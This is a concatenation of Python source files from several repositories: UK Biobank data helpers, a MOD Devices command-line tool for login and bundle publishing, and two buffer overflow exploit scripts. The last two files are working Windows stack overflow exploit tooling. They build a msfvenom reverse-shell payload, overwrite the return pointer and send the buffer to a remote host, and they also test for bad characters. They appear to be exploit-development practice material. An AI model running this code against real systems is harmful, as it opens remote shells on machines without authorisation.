return a dataframe that contains indicator variables for each specific 'key_code' in 'key_code_list'
use 'detai= True' to get the detail matched codes info
"""
dfcl=[]
if detai==False:
for l in key_code_list:
df_l=hes_gen_ind_raw(icd_in,hesin_dfin, l, str(evt), detail=False)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
if detai==True:
for l in key_code_list:
df_l=hes_gen_ind_raw(icd_in,hesin_dfin, l, str(evt), detail=True)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
def hes_gen_event_ind_from_list(icd_var, hes_df, event_code_list):
"""
return a dataframe that contains indicator variables for each pair of event and its related ICD code from HES database
"""
df_pool=[]
for lev1 in event_code_list:
print('load event: '+ str(lev1[0]))
for_event= lev1[0]
for_code= lev1[1]
#df_name= 'df_ind'+str(fid_int)+'_'+str(for_event)
df_pool_element=hes_gen_ind_list(icd_in=icd_var,hesin_dfin=hes_df, evt=for_event, key_code_list=for_code)
df_pool.append(df_pool_element)
df_pooled=pd.concat(df_pool,axis=1)
df_pooled=df_pooled.loc[:,~df_pooled.columns.duplicated()] # drop duplicated 'eid' columns
return df_pooled
def hes_gen_event_ind_from_multi_var(icd_var_list, hes_dfin, event_code_list,detail=False):
"""
return a dataframe that contains indicator variables for each event combined multiple icd measurements
"""
f_pool=[]
for f in icd_var_list:
print('\n working on icd_var= '+str(f))
f_pool_element= hes_gen_event_ind_from_list(icd_var=f, hes_df=hes_dfin, event_code_list=event_code_list)
f_pool.append(f_pool_element)
f_pooled= pd.concat(f_pool,axis=1)
f_pooled=f_pooled.loc[:,~f_pooled.columns.duplicated()] # drop duplicated 'eid' columns
if detail==True:
return f_pooled
if detail==False:
ind_pool=[]
for e in event_code_list:
event=e[0]
df_pre=f_pooled.filter(regex=event)
ind_name='hes_icd_ind_'+str(event)
leid=f_pooled.eid
lrec=f_pooled.record_id
ind_sum=df_pre.sum(axis=1)
df_e=pd.DataFrame({'eid':leid,'record_id':lrec,ind_name:ind_sum})
df_e[ind_name]=df_e[ind_name].apply(lambda y: 1 if y>0 else y)
df_e=df_e.loc[:,~df_e.columns.duplicated()] # drop duplicated 'eid' columns
ind_pool.append(df_e)
ind_pooled= pd.concat(ind_pool,axis=1)
ind_pooled=ind_pooled.loc[:,~ind_pooled.columns.duplicated()] # drop duplicated 'eid' columns
return ind_pooled
| Python | 432 | 35.495369 | 239 | /ukbb.py | 0.582547 | 0.574758 |
postincredible/ukbb | refs/heads/master | import os
import pandas as pd
import numpy as np
def load_data_by_fid(fid):
'''
return a dataframe that has the eid and the 'fid' variable
'''
df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
if int(fid) in df_tab1_i0_comp.fid.values.tolist():
fid_num=fid
var_description = df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Description.values[0]
var_type=df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Type.values[0]
var_type_list=['con','cur','dat','int','tex','tim','cas','cam']
var_type_list_full=['Continuous','Curve','Date','Integer','Text','Time','Categorical (single)', 'Categorical (multiple)']
path_p1='/temp_project/ukbb/data/i0/var_'
if var_type in var_type_list_full:
vtyp=var_type_list[var_type_list_full.index(var_type)]
loadpath=path_p1+str(vtyp)+'/'
os.chdir(path_p1+str(vtyp))
list_folder=os.listdir()
pname1=str(vtyp)+str(fid_num)+'i0.csv'
pname2='vec_'+str(vtyp)+str(fid_num)+'i0.csv'
if pname1 in list_folder:
print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
fpname=list_folder[list_folder.index(pname1)]
df_load=pd.read_csv(loadpath+fpname)
elif pname2 in list_folder:
print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
fpname=list_folder[list_folder.index(pname2)]
df_load=pd.read_csv(loadpath+fpname, sep='\t')
return df_load
else:
print('fid not found, please try again')
| Python | 46 | 36.97826 | 134 | /ukbb_ldbf.py | 0.602175 | 0.583286 |
moddevices/mod-devel-cli | refs/heads/master | import click
import crayons
from modcli import context, auth, __version__, bundle
_sso_disclaimer = '''SSO login requires you have a valid account in MOD Forum (https://forum.moddevices.com).
If your browser has an active session the credentials will be used for this login. Confirm?'''
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.version_option(prog_name='modcli', version=__version__)
def main():
pass
@click.group(name='auth', help='Authentication commands')
def auth_group():
pass
@click.group(name='bundle', help='LV2 bundle commands')
def bundle_group():
pass
@click.group(name='config', help='Configuration commands')
def config_group():
pass
@click.command(help='Authenticate user with SSO (MOD Forum)')
@click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
@click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
@click.option('-y', '--confirm-all', type=bool, help='Confirm all operations', is_flag=True)
@click.option('-d', '--detached-mode', type=bool, help='Run process without opening a local browser', is_flag=True)
@click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
def login_sso(show_token: bool, one_time: bool, confirm_all: bool, detached_mode: bool, env_name: str):
if env_name:
context.set_active_env(env_name)
env = context.current_env()
if not confirm_all:
response = click.confirm(_sso_disclaimer)
if not response:
exit(1)
if not one_time:
click.echo('Logging in to [{0}]...'.format(env.name))
try:
if detached_mode:
token = auth.login_sso_detached(env.api_url)
else:
token = auth.login_sso(env.api_url)
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
if not one_time:
env.set_token(token)
context.save()
if show_token or one_time:
print(token.strip())
else:
click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(env.username, env.name)))
@click.command(help='Authenticate user')
@click.option('-u', '--username', type=str, prompt=True, help='User ID')
@click.option('-p', '--password', type=str, prompt=True, hide_input=True, help='User password')
@click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
@click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
@click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
def login(username: str, password: str, show_token: bool, one_time: bool, env_name: str):
if env_name:
context.set_active_env(env_name)
env = context.current_env()
if not one_time:
click.echo('Logging in to [{0}]...'.format(env.name))
try:
token = auth.login(username, password, env.api_url)
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
if not one_time:
env.set_token(token)
context.save()
if show_token or one_time:
print(token.strip())
else:
click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(username, env.name)))
@click.command(help='Remove all tokens and reset context data')
def clear_context():
try:
context.clear()
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
click.echo(crayons.green('Context cleared'))
@click.command(help='Show current active access JWT token')
@click.option('-e', '--env_name', type=str, help='Show current active token from a specific environment')
def active_token(env_name: str):
if env_name:
context.set_active_env(env_name)
token = context.active_token()
if not token:
click.echo(crayons.red('You must authenticate first.'), err=True)
click.echo('Try:\n $ modcli auth login')
exit(1)
return
click.echo(token)
@click.command(help='Set active environment, where ENV_NAME is the name')
@click.argument('env_name')
def set_active_env(env_name: str):
try:
context.set_active_env(env_name)
context.save()
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
click.echo(crayons.green('Current environment set to: {0}'.format(env_name)))
@click.command(help='Add new environment, where ENV_NAME is the name, API_URL '
'and BUNDLE_URL are the API entry points')
@click.argument('env_name')
@click.argument('api_url')
@click.argument('bundle_url')
def add_env(env_name: str, api_url: str, bundle_url: str):
try:
context.add_env(env_name, api_url, bundle_url)
context.set_active_env(env_name)
context.save()
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
click.echo(crayons.green('Environment [{0}] added and set as active'.format(env_name)))
@click.command(help='List current configuration', name='list')
def list_config():
env = context.current_env()
click.echo('Active environment: {0}'.format(env.name))
click.echo('Authenticated in [{0}]: {1}'.format(env.name, 'Yes' if env.token else 'No'))
click.echo('Registered environments: {0}'.format(list(context.environments.keys())))
@click.command(help='Publish LV2 bundles, where PROJECT_FILE points to the buildroot project descriptor file (JSON)')
@click.argument('project_file')
@click.option('-p', '--packages-path', type=str, help='Path to buildroot package')
@click.option('-s', '--show-result', type=bool, help='Print pipeline process result', is_flag=True)
@click.option('-k', '--keep-environment', type=bool, help='Don\'t remove build environment after build', is_flag=True)
@click.option('-r', '--rebuild', type=bool, help='Don\'t increment release number, just rebuild', is_flag=True)
@click.option('-e', '--env', type=str, help='Environment where the bundles will be published')
@click.option('-f', '--force', type=bool, help='Don\'t ask for confirmation', is_flag=True)
def publish(project_file: str, packages_path: str, show_result: bool, keep_environment: bool,
rebuild: bool, env: str, force: bool):
try:
bundle.publish(project_file, packages_path, show_result=show_result,
keep_environment=keep_environment, rebuild=rebuild, env_name=env, force=force)
except Exception as ex:
click.echo(crayons.red(str(ex)), err=True)
exit(1)
return
auth_group.add_command(active_token)
auth_group.add_command(login)
auth_group.add_command(login_sso)
bundle_group.add_command(publish)
config_group.add_command(add_env)
config_group.add_command(set_active_env)
config_group.add_command(list_config)
config_group.add_command(clear_context)
main.add_command(auth_group)
main.add_command(bundle_group)
main.add_command(config_group)
if __name__ == '__main__':
main()
| Python | 196 | 35.591835 | 118 | /modcli/cli.py | 0.659649 | 0.656581 |
moddevices/mod-devel-cli | refs/heads/master | from modcli import config
__version__ = '1.1.3'
context = config.read_context()
| Python | 5 | 15.4 | 31 | /modcli/__init__.py | 0.682927 | 0.646341 |
moddevices/mod-devel-cli | refs/heads/master | import re
import sys
from setuptools import setup
with open('modcli/__init__.py', 'r') as fh:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fh.read(), re.MULTILINE).group(1)
if sys.version_info[0] < 3:
raise Exception("Must be using Python 3")
setup(
name='mod-devel-cli',
python_requires='>=3',
version=version,
description='MOD Command Line Interface',
author='Alexandre Cunha',
author_email='alex@moddevices.com',
license='Proprietary',
install_requires=[
'click==6.7',
'crayons==0.1.2',
'requests>=2.18.4',
],
packages=[
'modcli',
],
entry_points={
'console_scripts': [
'modcli = modcli.cli:main',
]
},
classifiers=[
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
url='http://moddevices.com/',
)
| Python | 41 | 23.512196 | 100 | /setup.py | 0.549254 | 0.534328 |
moddevices/mod-devel-cli | refs/heads/master | import os
CONFIG_DIR = os.path.expanduser('~/.config/modcli')
URLS = {
'labs': ('https://api-labs.moddevices.com/v2', 'https://pipeline-labs.moddevices.com/bundle/'),
'dev': ('https://api-dev.moddevices.com/v2', 'https://pipeline-dev.moddevices.com/bundle/'),
}
DEFAULT_ENV = 'labs'
| Python | 8 | 35.5 | 99 | /modcli/settings.py | 0.664384 | 0.657534 |
moddevices/mod-devel-cli | refs/heads/master | import base64
import json
import os
import stat
import re
from modcli import settings
from modcli.utils import read_json_file
def read_context():
context = CliContext.read(settings.CONFIG_DIR)
if len(context.environments) == 0:
for env_name, urls in settings.URLS.items():
context.add_env(env_name, urls[0], urls[1])
context.set_active_env(settings.DEFAULT_ENV)
context.save()
return context
def clear_context():
CliContext.clear(settings.CONFIG_DIR)
def _write_file(path: str, data: str, remove_existing: bool=True):
# create dir if doesn't exist
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname, exist_ok=True)
# remove previous file
if remove_existing:
if os.path.isfile(path):
os.remove(path)
# write json file
with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR), 'w') as fh:
fh.write(data)
fh.writelines(os.linesep)
def _write_json_file(path: str, data: dict, remove_existing: bool=True):
_write_file(path, json.dumps(data, indent=4), remove_existing)
def _remove_file(path: str):
if os.path.isfile(path):
os.remove(path)
class CliContext(object):
_filename = 'context.json'
_access_token_filename = 'access_token'
@staticmethod
def read(path: str):
context = CliContext(path)
data = read_json_file(os.path.join(path, CliContext._filename))
if not data:
return context
for env_data in data['environments']:
context.add_env(env_data['name'], env_data['api_url'], env_data['bundle_url'])
env = context.environments[env_data['name']]
env.username = env_data['username']
env.token = env_data['token']
env.exp = env_data['exp']
context.set_active_env(data['active_env'])
return context
def __init__(self, path: str):
self._path = path
self._active_env = ''
self.environments = {}
def _ensure_env(self, env_name: str):
if env_name not in self.environments:
raise Exception('Environment {0} doen\'t exist'.format(env_name))
def set_active_env(self, env_name: str):
if not env_name:
self._active_env = ''
else:
self._ensure_env(env_name)
self._active_env = env_name
def add_env(self, env_name: str, api_url: str, bundle_url: str):
if not env_name:
raise Exception('Environment name is invalid')
if env_name in self.environments:
raise Exception('Environment {0} already exists'.format(env_name))
if not re.match('https?://.*', api_url):
raise Exception('Invalid api_url: {0}'.format(api_url))
if not re.match('https?://.*', bundle_url):
raise Exception('Invalid api_url: {0}'.format(bundle_url))
self.environments[env_name] = EnvSettings(env_name, api_url, bundle_url)
def remove_env(self, env_name: str):
self._ensure_env(env_name)
del self.environments[env_name]
def active_token(self):
return self.current_env().token
def current_env(self):
if not self._active_env:
raise Exception('Not environment has been set')
return self.environments[self._active_env]
def get_env(self, env_name: str=None):
if not env_name:
return self.current_env()
self._ensure_env(env_name)
return self.environments[env_name]
def save(self):
data = {
'active_env': self._active_env,
'environments': list({
'name': e.name,
'api_url': e.api_url,
'bundle_url': e.bundle_url,
'username': e.username,
'token': e.token,
'exp': e.exp,
} for e in self.environments.values())
}
_write_json_file(os.path.join(self._path, CliContext._filename), data)
active_token = self.active_token()
if active_token:
_write_file(os.path.join(self._path, CliContext._access_token_filename), active_token)
else:
_remove_file(os.path.join(self._path, CliContext._access_token_filename))
def clear(self):
_remove_file(os.path.join(self._path, CliContext._filename))
_remove_file(os.path.join(self._path, CliContext._access_token_filename))
self.environments.clear()
class EnvSettings(object):
def __init__(self, name: str, api_url: str, bundle_url: str):
self.name = name
self.api_url = api_url.rstrip('/')
self.bundle_url = bundle_url.rstrip('/')
self.username = ''
self.token = ''
self.exp = ''
def set_token(self, token: str):
_, payload, _ = token.split('.')
payload_data = json.loads(base64.b64decode(payload + '===').decode())
username = payload_data['user_id']
exp = payload_data.get('exp', None)
self.username = username
self.token = token
self.exp = exp
| Python | 158 | 31.493671 | 100 | /modcli/config.py | 0.589794 | 0.587067 |
moddevices/mod-devel-cli | refs/heads/master | import socket
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse
import click
import requests
from click import Abort
from modcli import __version__
def login(username: str, password: str, api_url: str):
result = requests.post('{0}/users/tokens'.format(api_url), json={
'user_id': username,
'password': password,
'agent': 'modcli:{0}'.format(__version__),
})
if result.status_code != 200:
raise Exception('Error: {0}'.format(result.json()['error-message']))
return result.json()['message'].strip()
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def login_sso_detached(api_url: str):
click.echo('Running in detached mode...')
click.echo('1) Open this url in any browser: {0}'.format('{0}/users/tokens_sso'.format(api_url)))
click.echo('2) The URL will automatically redirect to MOD Forum (https://forum.moddevices.com)')
click.echo('3) Once MOD Forum page loads, if asked, enter your credentials or register a new user')
click.echo('4) A JWT token will be displayed in your browser')
try:
token = click.prompt('Copy the token value and paste it here, then press ENTER')
return token.strip()
except Abort:
exit(1)
def login_sso(api_url: str):
server_host = 'localhost'
server_port = get_open_port()
local_server = 'http://{0}:{1}'.format(server_host, server_port)
class SSORequestHandler(BaseHTTPRequestHandler):
token = ''
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
response = self.handle_http(200)
_, _, _, query, _ = parse.urlsplit(self.path)
result = parse.parse_qs(query)
tokens = result.get('token', None)
SSORequestHandler.token = tokens[0] if len(tokens) > 0 else None
self.wfile.write(response)
def handle_http(self, status_code):
self.send_response(status_code)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = '''
<html><head><title>modcli - success</title></head>
<body>Authentication successful! This browser window can be closed.</body></html>
'''
return bytes(content, 'UTF-8')
def log_message(self, format, *args):
pass
httpd = HTTPServer((server_host, server_port), SSORequestHandler)
httpd.timeout = 30
webbrowser.open('{0}/users/tokens_sso?local_url={1}'.format(api_url, local_server))
try:
httpd.handle_request()
except KeyboardInterrupt:
pass
token = SSORequestHandler.token
if not token:
raise Exception('Authentication failed!')
return token
| Python | 93 | 31.258064 | 103 | /modcli/auth.py | 0.618 | 0.607667 |
moddevices/mod-devel-cli | refs/heads/master | import os
import shutil
import subprocess
import tempfile
from hashlib import md5
import click
import crayons
import requests
from modcli import context
from modcli.utils import read_json_file
def publish(project_file: str, packages_path: str, keep_environment: bool=False, bundles: list=None,
show_result: bool=False, rebuild: bool=False, env_name: str=None, force: bool=False):
project_file = os.path.realpath(project_file)
packages_path = os.path.realpath(packages_path) if packages_path else None
env = context.get_env(env_name)
if not env.token:
raise Exception('You must authenticate first')
if not os.path.isfile(project_file):
raise Exception('File {0} not found or not a valid file'.format(project_file))
if packages_path:
if not os.path.isdir(packages_path):
raise Exception('Packages path {0} not found'.format(packages_path))
else:
packages_path = os.path.dirname(project_file)
project = os.path.split(project_file)[1]
if not force and not click.confirm('Project {0} will be compiled and published in [{1}], '
'do you confirm?'.format(crayons.green(project), crayons.green(env.name))):
raise Exception('Cancelled')
process = read_json_file(project_file)
# setting up process data
if keep_environment:
process['keep_environment'] = True
process['rebuild'] = rebuild
buildroot_pkg = process.pop('buildroot_pkg', None)
mk_filename = '{0}.mk'.format(buildroot_pkg)
if not buildroot_pkg:
raise Exception('Missing buildroot_pkg in project file')
if bundles:
process['bundles'] = [b for b in process['bundles'] if b['name'] in bundles]
if not process['bundles']:
raise Exception('Could not match any bundle from: {0}'.format(bundles))
# find buildroot_pkg under packages_path
mk_path = next((i[0] for i in os.walk(packages_path) if mk_filename in i[2]), None)
if not mk_path:
raise Exception('Could not find buildroot mk file for package {0} in {1}'.format(buildroot_pkg, packages_path))
basename = os.path.basename(mk_path)
if basename != buildroot_pkg:
raise Exception('The package folder containing the .mk file has to be named {0}'.format(buildroot_pkg))
pkg_path = os.path.dirname(mk_path)
work_dir = tempfile.mkdtemp()
try:
package = '{0}.tar.gz'.format(buildroot_pkg)
source_path = os.path.join(work_dir, package)
try:
subprocess.check_output(
['tar', 'zhcf', source_path, buildroot_pkg], stderr=subprocess.STDOUT, cwd=os.path.join(pkg_path)
)
except subprocess.CalledProcessError as ex:
raise Exception(ex.output.decode())
click.echo('Submitting release process for project {0} using file {1}'.format(project_file, package))
click.echo('URL: {0}'.format(env.bundle_url))
headers = {'Authorization': 'MOD {0}'.format(env.token)}
result = requests.post('{0}/'.format(env.bundle_url), json=process, headers=headers)
if result.status_code == 401:
raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
elif result.status_code != 200:
raise Exception('Error: {0}'.format(result.text))
release_process = result.json()
click.echo('Release process created: {0}'.format(release_process['id']))
click.echo('Uploading buildroot package {0} ...'.format(package))
with open(source_path, 'rb') as fh:
data = fh.read()
headers = {'Content-Type': 'application/octet-stream'}
result = requests.post(release_process['source-href'], data=data, headers=headers)
if result.status_code == 401:
raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
elif result.status_code != 201:
raise Exception('Error: {0}'.format(result.text))
checksum = result.text.lstrip('"').rstrip('"')
result_checksum = md5(data).hexdigest()
if checksum == result_checksum:
click.echo('Checksum match ok!')
else:
raise Exception('Checksum mismatch: {0} <> {1}'.format(checksum, result_checksum))
finally:
click.echo('Cleaning up...')
shutil.rmtree(work_dir, ignore_errors=True)
release_process_url = release_process['href']
click.echo(crayons.blue('Process url: {0}?pretty=true'.format(release_process_url)))
click.echo(crayons.green('Done'))
if show_result:
click.echo('Retrieving release process from {0} ...'.format(release_process_url))
release_process_full = requests.get('{0}?pretty=true'.format(release_process_url)).text
click.echo(crayons.blue('================ Release Process {0} ================'.format(release_process['id'])))
click.echo(release_process_full)
click.echo(crayons.blue('================ End Release Process ================'))
| Python | 114 | 43.175438 | 119 | /modcli/bundle.py | 0.636616 | 0.628276 |
moddevices/mod-devel-cli | refs/heads/master | import json
import os
def read_json_file(path: str):
if not os.path.isfile(path):
return {}
with open(path, 'r') as file:
contents = file.read()
return json.loads(contents)
| Python | 10 | 19.299999 | 33 | /modcli/utils.py | 0.615764 | 0.615764 |
sholong/utils_script | refs/heads/master | # -*- coding:utf-8 -*-
from redis import Redis
# Redis列表的边界下标
LEFTMOST = 0
RIGHTMOST = -1
class RedisListSecondPack:
def __init__(self, name, client=Redis()):
self.name = name
self.client = client
def left_append(self, content):
# 从列表最左边追加value
return self.client.lpush(self.name, content)
def right_append(self, content):
# 从列表最右边追加value
return self.client.rpush(self.name, content)
def read(self, start=LEFTMOST, stop=RIGHTMOST):
# 获取裂变[start: stop]之间数据,默认状态下获取所有
return self.client.lrange(self.name, start, stop)
def length(self):
# 获取列表长度
return self.client.llen(self.name)
def clear(self):
# 因为del是Python的保留字
# 所以redis-py用delete代替del命令
self.client.delete(self.name)
def keep(self, size):
# 只保留列表范围内的条目
self.client.ltrim(self.name, LEFTMOST, size-1)
if __name__ == '__main__':
import json
client = Redis(host='localhost', port=6379, db=0)
list_operate_client = RedisListSecondPack('SHOWPAYBIZ000001', client)
for x in range(4):
list_operate_client.left_append(json.dumps({'a': 'my %s data' % str(x)}))
print list_operate_client.read(), list_operate_client.length()
list_operate_client.keep(3)
print list_operate_client.read(), list_operate_client.length()
list_operate_client.clear()
| Python | 51 | 26.235294 | 81 | /redis_list_operate.py | 0.636755 | 0.624551 |
Maheerr2707/C-111HW | refs/heads/main | import plotly.figure_factory as ff
import pandas as pd
import csv
import statistics
import random
import plotly.graph_objects as go
df = pd.read_csv("StudentsPerformance.csv")
data = df["mathscore"].tolist()
""" fig = ff.create_distplot([data], ["Math Scores"], show_hist=False)
fig.show() """
P_mean = statistics.mean(data)
P_stdev = statistics.stdev(data)
print("Mean of the Population: ", P_mean)
print("Standard Deviation of the Population: ", P_stdev)
def randomSetOfMeans(counter):
dataSet = []
for i in range (0, counter):
randomIndex = random.randint(0, len(data) - 1)
value = data[randomIndex]
dataSet.append(value)
mean = statistics.mean(dataSet)
return(mean)
meanList = []
for i in range (0,100):
setOfMeans = randomSetOfMeans(30)
meanList.append(setOfMeans)
S_mean = statistics.mean(meanList)
S_stdev = statistics.stdev(meanList)
print("Mean of the Sample: ", S_mean)
print("Standard Deviation of the Sample: ", S_stdev)
first_stdev_start, first_stdev_end = P_mean - P_stdev, P_mean + P_stdev
second_stdev_start, second_stdev_end = P_mean - (2*P_stdev), P_mean + (2*P_stdev)
third_stdev_start, third_stdev_end = P_mean - (3*P_stdev), P_mean + (3*P_stdev)
fig = ff.create_distplot([meanList], ["Math Scores"], show_hist=False)
fig.add_trace(go.Scatter(x=[P_mean, P_mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[first_stdev_start, first_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
fig.add_trace(go.Scatter(x=[first_stdev_end, first_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
fig.add_trace(go.Scatter(x=[second_stdev_start, second_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
fig.add_trace(go.Scatter(x=[second_stdev_end, second_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
fig.add_trace(go.Scatter(x=[third_stdev_start, third_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
fig.add_trace(go.Scatter(x=[third_stdev_end, third_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
#First Intervention Data Analyzation
df_1 = pd.read_csv("Inter1.csv")
data_1 = df_1["mathscore"].tolist()
meanOfSample1 = statistics.mean(data_1)
print("Mean of Sample 1: ", meanOfSample1)
fig.add_trace(go.Scatter(x=[meanOfSample1, meanOfSample1], y=[0, 0.17], mode="lines", name="Mean of Sample 1"))
#Third Intervention Data Analyzation
df_3 = pd.read_csv("Inter3.csv")
data_3 = df_3["mathscore"].tolist()
meanOfSample3 = statistics.mean(data_3)
print("Mean of Sample 3: ", meanOfSample3)
fig.add_trace(go.Scatter(x=[meanOfSample3, meanOfSample3], y=[0, 0.17], mode="lines", name="Mean of Sample 3"))
fig.show()
#Z-Score
ZScore = (meanOfSample1-P_mean)/P_stdev
print("Z-Score 1: ", ZScore)
ZScore3 = (meanOfSample3-P_mean)/P_stdev
print("Z-Score 3: ", ZScore3)
| Python | 75 | 37.546665 | 125 | /mean.py | 0.677006 | 0.649022 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import struct, functions, subprocess
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
ptr_jmp_esp = functions.getPtrJmpEsp()
LHOST = functions.getLhost()
LPORT = functions.getLport()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
# instead of using NOPs, drag ESP up the stack to avoid GetPC issues
# note: when modifying ESP, always ensure that it remains divisible by 4
sub_esp_10 = "\x83\xec\x10"
LHOSTstr = "LHOST=" + LHOST
LPORTstr = "LPORT=" + str(LPORT)
# import shellcode from shellcode.py; or create shellcode if not exists
try:
import shellcode
print "shellcode.py already exists - using that shellcode..."
except:
badchars = [struct.pack("B", x).encode("hex") for x in functions.getBadChars()]
# print badchars
for x in range(0, len(badchars)):
badchars[x] = '\\x' + badchars[x]
# print a[x]
# print badchars
badcharsstr = "'" + ''.join(badchars) + "'"
print "badcharsstr =", badcharsstr
cmd = ["msfvenom", "-p", "windows/shell_reverse_tcp", LHOSTstr, LPORTstr, "EXITFUNC=thread", "-v", "shellcode", "-b", badcharsstr, "-f", "python", "-o", "shellcode.py"]
print ' '.join(cmd)
try:
subprocess.check_output(cmd)
import shellcode
except:
print "Error generating shellcode :("
exit()
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite
buf += sub_esp_10 # ESP points here
buf += shellcode.shellcode
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf.encode("hex")
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Caught reverse shell?"
| Python | 72 | 30.513889 | 172 | /7_reverse_shell.py | 0.669458 | 0.662847 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Used to test bad characters as part of the process in developing a
# Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions, argparse
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
parser = argparse.ArgumentParser()
parser.add_argument("-b", help="Bad characters in hex format, no spaces, eg. 0x0A,0x7B", dest='additional_bchars', nargs='+')
args = parser.parse_args()
print "Additional bad chars =", str(args.additional_bchars)
badchar_test = "" # start with an empty string
badchars = [0x00, 0x0A] # we've reasoned that these are definitely bad
if args.additional_bchars is not None:
extras = args.additional_bchars[0].split(",") # split out by comma delimeter
for i in range(0, len(extras)):
extras[i] = int(extras[i], 16) # convert from str to hex int
badchars.append(extras[i]) # append bad char to badchars list
# remove any duplicates
badchars = list(dict.fromkeys(badchars))
print "badchars =", [hex(x) for x in badchars]
# TODO check to see if badchars already exists...
functions.writeParamToFile("badchars", badchars)
# generate the string
for i in range(0x00, 0xFF+1): # range(0x00, 0xFF) only returns up to 0xFE
if i not in badchars: # skip the badchars
badchar_test += chr(i) # append each non-badchar to the string
try:
# open a file for writing ("w") the string as binary ("b") data
with open("badchar_test.bin", "wb") as f:
f.write(badchar_test)
except:
print "Error when writing to file. Quitting..."
quit()
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += "BBBB" # SRP overwrite
buf += badchar_test # ESP points here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "\nSet up mona byte array as follows:"
print "!mona bytearray -cpb \"\\x00\\x0a<other bad chars>\"\n"
print "Use \"!mona cmp -a esp -f C:\\path\\bytearray.bin\" to check bad chars."
print "Then run \"!mona jmp -r esp -cpb \"\\x00\\x0a<other bad chars>\" to search for \"jmp esp\" memory addresses."
print "\nAlso try \"!mona modules\" to find an unprotected module, followed by"
print "\"!mona find -s \"\\xff\\xe4\" -cpb \"\\x00\\x0a<other bad chars>\" -m <module_name>\""
print "\nEnter discovered jmp esp (or \\xff\\xe4) memory address at next step."
| Python | 80 | 36.400002 | 125 | /4_test_badchars.py | 0.671123 | 0.658088 |
